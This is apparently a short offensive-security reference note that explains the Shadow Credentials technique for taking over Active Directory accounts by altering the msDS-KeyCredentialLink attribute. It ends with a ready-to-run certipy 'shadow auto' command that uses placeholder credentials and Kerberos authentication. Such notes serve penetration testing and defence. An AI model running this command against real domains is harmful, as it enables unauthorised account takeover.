Last modified: 2023-11-11
Shadow Credentials is an attack technique to take over Active Directory user/computer account by compromising msDS-KeyCredentialLink property of target objects.
If the attacker can modify the target object's (user or computer account) attribute
msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates, he takes over the account in AD.
# -k: Use Kerberos authentication certipy shadow auto -account "targetuser" -u "firstname.lastname@example.org" -p 'password' -dc-ip 10.0.0.1 -target dc.example.local -k